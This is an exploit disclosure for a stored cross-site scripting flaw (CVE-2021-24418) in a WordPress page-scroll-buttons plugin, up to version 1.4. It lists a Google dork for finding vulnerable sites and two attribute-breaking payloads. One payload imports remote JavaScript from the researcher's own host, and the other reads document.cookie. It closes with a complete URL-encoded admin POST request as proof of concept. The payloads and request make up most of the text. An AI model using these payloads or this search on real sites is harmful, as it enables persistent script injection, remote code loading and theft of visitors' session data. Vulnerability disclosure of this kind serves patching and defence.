/*!
- # VULNERABILITY: Smooth Scroll Page Up/Down Buttons WordPress Plugin <= 1.4 - Authenticated Persistent XSS
- # GOOGLE DORK: inurl:/wp-content/plugins/smooth-page-scroll-updown-buttons/
- # DATE: 2021-04-29
- # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
- # VENDOR: Mark Senff [ http://www.senff.com ]
- # SOFTWARE VERSION: <= 1.4
- # SOFTWARE LINK: https://wordpress.org/plugins/smooth-page-scroll-updown-buttons/
- # CVSS: AV:N/AC:L/PR:H/UI:R/S:C
- # CWE: CWE-79
- # CVE: CVE-2021-24418
*/



### -- [ Info: ]

[i] An Authenticated Persistent XSS vulnerability was discovered in the Smooth Scroll Page Up/Down Buttons plugin through v1.4 for WordPress.

[i] Vulnerable parameter(s): $page_scroll_buttons_options['psb_positioning'] (smooth-page-scroll-updown-buttons/smooth-page-scroll-updown-buttons.php:212-215).



### -- [ Impact: ]

[~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.



### -- [ Payloads: ]

[$] m0ze" style=position:fixed!important;z-index:99999;display:flex;align-items:center;justify-content:center;width:100%;height:100%;font-size:214px;background:black;color:lime;top:0;bottom:0;left:0;right:0;overflow:visible!important; onmousemove=;import(`https://m0ze.ru/payload/a.js`); m0ze=

[$] m0ze" style=position:fixed!important;z-index:99999;display:flex;align-items:center;justify-content:center;width:100%;height:100%;font-size:214px;background:black;color:lime;top:0;bottom:0;left:0;right:0;overflow:visible!important; onmousemove=;alert(document.cookie); "><div m0ze=



### -- [ PoC | Authenticated Persistent XSS | Positioning: ]

[!] POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookie]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 1077

action=save_page_scroll_buttons_options&_wpnonce=458df9b026&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpagescrollupdownmenu%26message%3D1&psb_topbutton=on&psb_positioning=%6d%30%7a%65%22%20%73%74%79%6c%65%3d%70%6f%73%69%74%69%6f%6e%3a%66%69%78%65%64%21%69%6d%70%6f%72%74%61%6e%74%3b%7a%2d%69%6e%64%65%78%3a%39%39%39%39%39%3b%64%69%73%70%6c%61%79%3a%66%6c%65%78%3b%61%6c%69%67%6e%2d%69%74%65%6d%73%3a%63%65%6e%74%65%72%3b%6a%75%73%74%69%66%79%2d%63%6f%6e%74%65%6e%74%3a%63%65%6e%74%65%72%3b%77%69%64%74%68%3a%31%30%30%25%3b%68%65%69%67%68%74%3a%31%30%30%25%3b%66%6f%6e%74%2d%73%69%7a%65%3a%32%31%34%70%78%3b%62%61%63%6b%67%72%6f%75%6e%64%3a%62%6c%61%63%6b%3b%63%6f%6c%6f%72%3a%6c%69%6d%65%3b%74%6f%70%3a%30%3b%62%6f%74%74%6f%6d%3a%30%3b%6c%65%66%74%3a%30%3b%72%69%67%68%74%3a%30%3b%6f%76%65%72%66%6c%6f%77%3a%76%69%73%69%62%6c%65%21%69%6d%70%6f%72%74%61%6e%74%3b%20%6f%6e%6d%6f%75%73%65%6d%6f%76%65%3d%3b%61%6c%65%72%74%28%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%29%3b%20%22%3e%3c%64%69%76%20%6d%30%7a%65%3d&psb_distance=50&psb_buttonsize=46&psb_speed=1000



### -- [ Contacts: ]

[+] Website: m0ze.ru
[+] GitHub: @m0ze
[+] Telegram: @m0ze_ru
[+] Twitter: @vladm0ze